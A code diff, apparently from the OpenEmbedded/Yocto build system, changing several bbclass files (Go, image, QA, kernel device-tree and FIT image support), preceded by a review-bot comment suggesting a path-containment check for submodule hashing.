227 sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest() 238 sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
228 with open(oe_hash_file, 'w') as fobj: 239 with open(oe_hash_file, 'w') as fobj:
229 fobj.write(sha1) 240 fobj.write(sha1)
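Review bot: In the submodule loop of srctree_hash_files, the path read from `.gitmodules` is joined to `s_dir` and used as `cwd` for `git add` and `git write-tree` with only an `os.path.isdir` check, so an absolute or `..`-containing `path` value makes the hash cover a directory outside the source tree. `--get-regexp path` also matches any key whose name contains "path", and `line.rsplit(maxsplit=1)[1]` keeps only the last whitespace-separated token of a path that contains spaces. I would anchor the pattern, e.g. `'^submodule\..*\.path$'`, and require containment before descending: `if os.path.isdir(module_dir) and os.path.realpath(module_dir).startswith(os.path.realpath(s_dir) + os.sep):`. The return codes of the two `Popen` calls are not checked, so a failing `git write-tree` silently contributes nothing to the hash. The function starts and ends outside this hunk.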
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
4def get_rootfs_uuid(d): 4def get_rootfs_uuid(d):
5 import subprocess 5 import subprocess
6 rootfs = d.getVar('ROOTFS') 6 rootfs = d.getVar('ROOTFS')
7 output = subprocess.check_output(['tune2fs', '-l', rootfs]) 7 output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
8 for line in output.split('\n'): 8 for line in output.split('\n'):
9 if line.startswith('Filesystem UUID:'): 9 if line.startswith('Filesystem UUID:'):
10 uuid = line.split()[-1] 10 uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index e6c3591479..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -118,7 +118,7 @@ go_do_install() {
118 tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \ 118 tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
119 tar -C ${D}${libdir}/go --no-same-owner -xf - 119 tar -C ${D}${libdir}/go --no-same-owner -xf -
120 120
121 if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then 121 if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
122 install -d ${D}${bindir} 122 install -d ${D}${bindir}
123 install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/ 123 install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
124 fi 124 fi
@@ -145,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
145 145
146INSANE_SKIP_${PN} += "ldflags" 146INSANE_SKIP_${PN} += "ldflags"
147 147
148# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips 148# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
149# doesn't support -buildmode=pie, so skip the QA checking for mips and its 149# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
150# variants. 150# for windows/mips/riscv and their variants.
151python() { 151python() {
152 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'): 152 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
153 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel") 153 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
154 else: 154 else:
155 d.appendVar('GOBUILDFLAGS', ' -buildmode=pie') 155 d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
114def go_map_os(o, d): 114def go_map_os(o, d):
115 if o.startswith('linux'): 115 if o.startswith('linux'):
116 return 'linux' 116 return 'linux'
117 elif o.startswith('mingw'):
118 return 'windows'
117 return o 119 return o
118 120
119 121
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
30 virtual/kernel:do_deploy \ 30 virtual/kernel:do_deploy \
31 ${MLPREFIX}syslinux:do_populate_sysroot \ 31 ${MLPREFIX}syslinux:do_populate_sysroot \
32 syslinux-native:do_populate_sysroot \ 32 syslinux-native:do_populate_sysroot \
33 ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \ 33 ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
34 " 34 "
35 35
36 36
@@ -261,4 +261,4 @@ python do_bootimg() {
261do_bootimg[subimages] = "hddimg iso" 261do_bootimg[subimages] = "hddimg iso"
262do_bootimg[imgsuffix] = "." 262do_bootimg[imgsuffix] = "."
263 263
264addtask bootimg before do_image_complete 264addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
38# Generate companion debugfs? 38# Generate companion debugfs?
39IMAGE_GEN_DEBUGFS ?= "0" 39IMAGE_GEN_DEBUGFS ?= "0"
40 40
41# These pacackages will be installed as additional into debug rootfs 41# These packages will be installed as additional into debug rootfs
42IMAGE_INSTALL_DEBUGFS ?= "" 42IMAGE_INSTALL_DEBUGFS ?= ""
43 43
44# These packages will be removed from a read-only rootfs after all other 44# These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
115 'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS'] 115 'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
116 116
117python () { 117python () {
118 variables = rootfs_command_variables(d) + sdk_command_variables(d) 118 variables = rootfs_command_variables(d)
119 for var in variables: 119 for var in variables:
120 if d.getVar(var, False): 120 if d.getVar(var, False):
121 d.setVarFlag(var, 'func', '1') 121 d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
124def rootfs_variables(d): 124def rootfs_variables(d):
125 from oe.rootfs import variable_depends 125 from oe.rootfs import variable_depends
126 variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE', 126 variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
127 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 127 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
128 'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS', 128 'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
129 'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS', 129 'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
130 'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS'] 130 'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
176 176
177LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}" 177LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
178 178
179# per default create a locale archive
180IMAGE_LOCALES_ARCHIVE ?= '1'
181
179# Prefer image, but use the fallback files for lookups if the image ones 182# Prefer image, but use the fallback files for lookups if the image ones
180# aren't yet available. 183# aren't yet available.
181PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}" 184PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
182 185
186PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
187
183PACKAGE_EXCLUDE ??= "" 188PACKAGE_EXCLUDE ??= ""
184PACKAGE_EXCLUDE[type] = "list" 189PACKAGE_EXCLUDE[type] = "list"
185 190
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
306 except oe.utils.ImageQAFailed as e: 311 except oe.utils.ImageQAFailed as e:
307 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description) 312 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
308 except Exception as e: 313 except Exception as e:
309 qamsg = qamsg + '\tImage QA function %s failed\n' % cmd 314 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
310 315
311 if qamsg: 316 if qamsg:
312 imgname = d.getVar('IMAGE_NAME') 317 imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
432 localdata.delVar('DATETIME') 437 localdata.delVar('DATETIME')
433 localdata.delVar('DATE') 438 localdata.delVar('DATE')
434 localdata.delVar('TMPDIR') 439 localdata.delVar('TMPDIR')
435 vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split() 440 vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
436 for dep in vardepsexclude: 441 for dep in vardepsexclude:
437 localdata.delVar(dep) 442 localdata.delVar(dep)
438 443
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
660 fi 665 fi
661 # Set mtime of all files to a reproducible value 666 # Set mtime of all files to a reproducible value
662 bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS" 667 bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
663 find ${IMAGE_ROOTFS} -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \; 668 find ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
664 fi 669 fi
665} 670}
666 671
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index ff42ac9423..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
240EXTRA_IMAGECMD_ext2 ?= "-i 4096" 240EXTRA_IMAGECMD_ext2 ?= "-i 4096"
241EXTRA_IMAGECMD_ext3 ?= "-i 4096" 241EXTRA_IMAGECMD_ext3 ?= "-i 4096"
242EXTRA_IMAGECMD_ext4 ?= "-i 4096" 242EXTRA_IMAGECMD_ext4 ?= "-i 4096"
243EXTRA_IMAGECMD_btrfs ?= "-n 4096" 243EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
244EXTRA_IMAGECMD_f2fs ?= "" 244EXTRA_IMAGECMD_f2fs ?= ""
245 245
246do_image_cpio[depends] += "cpio-native:do_populate_sysroot" 246do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
174 if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir): 174 if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
175 # The dynamic linker searches both these places anyway. There is no point in 175 # The dynamic linker searches both these places anyway. There is no point in
176 # looking there again. 176 # looking there again.
177 package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath)) 177 package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
178 178
179QAPATHTEST[dev-so] = "package_qa_check_dev" 179QAPATHTEST[dev-so] = "package_qa_check_dev"
180def package_qa_check_dev(path, name, d, elf, messages): 180def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
183 """ 183 """
184 184
185 if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path): 185 if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
186 package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \ 186 package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
187 (name, package_qa_clean_path(path,d))) 187 (name, package_qa_clean_path(path, d, name)))
188 188
189QAPATHTEST[dev-elf] = "package_qa_check_dev_elf" 189QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
190def package_qa_check_dev_elf(path, name, d, elf, messages): 190def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
194 install link-time .so files that are linker scripts. 194 install link-time .so files that are linker scripts.
195 """ 195 """
196 if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf: 196 if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
197 package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \ 197 package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
198 (name, package_qa_clean_path(path,d))) 198 (name, package_qa_clean_path(path, d, name)))
199 199
200QAPATHTEST[staticdev] = "package_qa_check_staticdev" 200QAPATHTEST[staticdev] = "package_qa_check_staticdev"
201def package_qa_check_staticdev(path, name, d, elf, messages): 201def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
208 208
209 if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path: 209 if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
210 package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \ 210 package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
211 (name, package_qa_clean_path(path,d))) 211 (name, package_qa_clean_path(path,d, name)))
212 212
213QAPATHTEST[mime] = "package_qa_check_mime" 213QAPATHTEST[mime] = "package_qa_check_mime"
214def package_qa_check_mime(path, name, d, elf, messages): 214def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
452 """ 452 """
453 Check for build paths inside target files and error if not found in the whitelist 453 Check for build paths inside target files and error if not found in the whitelist
454 """ 454 """
455 import stat
455 # Ignore .debug files, not interesting 456 # Ignore .debug files, not interesting
456 if path.find(".debug") != -1: 457 if path.find(".debug") != -1:
457 return 458 return
458 459
459 # Ignore symlinks 460 # Ignore symlinks/devs/fifos
460 if os.path.islink(path): 461 mode = os.lstat(path).st_mode
462 if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
461 return 463 return
462 464
463 tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8") 465 tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
945 947
946 dest = d.getVar('PKGDEST') 948 dest = d.getVar('PKGDEST')
947 pn = d.getVar('PN') 949 pn = d.getVar('PN')
948 home = os.path.join(dest, 'home') 950 home = os.path.join(dest, name, 'home')
949 if path == home or path.startswith(home + os.sep): 951 if path == home or path.startswith(home + os.sep):
950 return 952 return
951 953
@@ -1012,26 +1014,6 @@ python do_package_qa () {
1012 logdir = d.getVar('T') 1014 logdir = d.getVar('T')
1013 pn = d.getVar('PN') 1015 pn = d.getVar('PN')
1014 1016
1015 # Check the compile log for host contamination
1016 compilelog = os.path.join(logdir,"log.do_compile")
1017
1018 if os.path.exists(compilelog):
1019 statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
1020 if subprocess.call(statement, shell=True) == 0:
1021 msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
1022 Please check the log '%s' for more information." % (pn, compilelog)
1023 package_qa_handle_error("compile-host-path", msg, d)
1024
1025 # Check the install log for host contamination
1026 installlog = os.path.join(logdir,"log.do_install")
1027
1028 if os.path.exists(installlog):
1029 statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
1030 if subprocess.call(statement, shell=True) == 0:
1031 msg = "%s: The install log indicates that host include and/or library paths were used.\n \
1032 Please check the log '%s' for more information." % (pn, installlog)
1033 package_qa_handle_error("install-host-path", msg, d)
1034
1035 # Scan the packages... 1017 # Scan the packages...
1036 pkgdest = d.getVar('PKGDEST') 1018 pkgdest = d.getVar('PKGDEST')
1037 packages = set((d.getVar('PACKAGES') or '').split()) 1019 packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
1210 if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe: 1192 if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
1211 bb.note("Checking autotools environment for common misconfiguration") 1193 bb.note("Checking autotools environment for common misconfiguration")
1212 for root, dirs, files in os.walk(workdir): 1194 for root, dirs, files in os.walk(workdir):
1213 statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \ 1195 statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
1214 os.path.join(root,"config.log") 1196 os.path.join(root,"config.log")
1215 if "config.log" in files: 1197 if "config.log" in files:
1216 if subprocess.call(statement, shell=True) == 0: 1198 if subprocess.call(statement, shell=True) == 0:
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
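--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
 TARGET_AR_KERNEL_ARCH ?= ""
 HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
 
-KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}"
+KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
 KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
 KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-TOOLCHAIN = "gcc"
+TOOLCHAIN ?= "gcc"
 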
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
1# Support for device tree generation 1# Support for device tree generation
2PACKAGES_append = " \ 2python () {
3 ${KERNEL_PACKAGE_NAME}-devicetree \ 3 if not bb.data.inherits_class('nopackages', d):
4 ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \ 4 d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
5" 5 if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
6 d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
7}
8
6FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo" 9FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
7FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin" 10FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
8 11
9# Generate kernel+devicetree bundle 12# Generate kernel+devicetree bundle
10KERNEL_DEVICETREE_BUNDLE ?= "0" 13KERNEL_DEVICETREE_BUNDLE ?= "0"
11 14
15# dtc flags passed via DTC_FLAGS env variable
16KERNEL_DTC_FLAGS ?= ""
17
12normalize_dtb () { 18normalize_dtb () {
13 dtb="$1" 19 dtb="$1"
14 if echo $dtb | grep -q '/dts/'; then 20 if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
50} 56}
51 57
52do_compile_append() { 58do_compile_append() {
59 if [ -n "${KERNEL_DTC_FLAGS}" ]; then
60 export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
61 fi
62
53 for dtbf in ${KERNEL_DEVICETREE}; do 63 for dtbf in ${KERNEL_DEVICETREE}; do
54 dtb=`normalize_dtb "$dtbf"` 64 dtb=`normalize_dtb "$dtbf"`
55 oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} 65 oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
1inherit kernel-uboot kernel-artifact-names uboot-sign 1inherit kernel-uboot kernel-artifact-names uboot-sign
2 2
3KERNEL_IMAGETYPE_REPLACEMENT = ""
4
3python __anonymous () { 5python __anonymous () {
4 kerneltypes = d.getVar('KERNEL_IMAGETYPES') or "" 6 kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
5 if 'fitImage' in kerneltypes.split(): 7 if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
21 else: 23 else:
22 replacementtype = "zImage" 24 replacementtype = "zImage"
23 25
26 d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
27
24 # Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal 28 # Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
25 # to kernel.bbclass . We have to override it, since we pack zImage 29 # to kernel.bbclass . We have to override it, since we pack zImage
26 # (at least for now) into the fitImage . 30 # (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
45 if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'): 49 if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
46 uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot' 50 uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
47 d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn) 51 d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
52 if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
53 d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
48} 54}
49 55
50# Options for the device tree compiler passed to mkimage '-D' feature: 56# Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
56# fitImage Signature Algo 62# fitImage Signature Algo
57FIT_SIGN_ALG ?= "rsa2048" 63FIT_SIGN_ALG ?= "rsa2048"
58 64
65# fitImage Padding Algo
66FIT_PAD_ALG ?= "pkcs-1.5"
67
68# Arguments passed to mkimage for signing
69UBOOT_MKIMAGE_SIGN_ARGS ?= ""
70
59# 71#
60# Emit the fitImage ITS header 72# Emit the fitImage ITS header
61# 73#
@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
124 fi 136 fi
125 137
126 cat << EOF >> ${1} 138 cat << EOF >> ${1}
127 kernel@${2} { 139 kernel-${2} {
128 description = "Linux kernel"; 140 description = "Linux kernel";
129 data = /incbin/("${3}"); 141 data = /incbin/("${3}");
130 type = "kernel"; 142 type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
133 compression = "${4}"; 145 compression = "${4}";
134 load = <${UBOOT_LOADADDRESS}>; 146 load = <${UBOOT_LOADADDRESS}>;
135 entry = <${ENTRYPOINT}>; 147 entry = <${ENTRYPOINT}>;
136 hash@1 { 148 hash-1 {
137 algo = "${kernel_csum}"; 149 algo = "${kernel_csum}";
138 }; 150 };
139 }; 151 };
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
160 dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;" 172 dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
161 fi 173 fi
162 cat << EOF >> ${1} 174 cat << EOF >> ${1}
163 fdt@${2} { 175 fdt-${2} {
164 description = "Flattened Device Tree blob"; 176 description = "Flattened Device Tree blob";
165 data = /incbin/("${3}"); 177 data = /incbin/("${3}");
166 type = "flat_dt"; 178 type = "flat_dt";
167 arch = "${UBOOT_ARCH}"; 179 arch = "${UBOOT_ARCH}";
168 compression = "none"; 180 compression = "none";
169 ${dtb_loadline} 181 ${dtb_loadline}
170 hash@1 { 182 hash-1 {
171 algo = "${dtb_csum}"; 183 algo = "${dtb_csum}";
172 }; 184 };
173 }; 185 };
@@ -175,6 +187,43 @@ EOF
175} 187}
176 188
177# 189#
190# Emit the fitImage ITS u-boot script section
191#
192# $1 ... .its filename
193# $2 ... Image counter
194# $3 ... Path to boot script image
195fitimage_emit_section_boot_script() {
196
197 bootscr_csum="${FIT_HASH_ALG}"
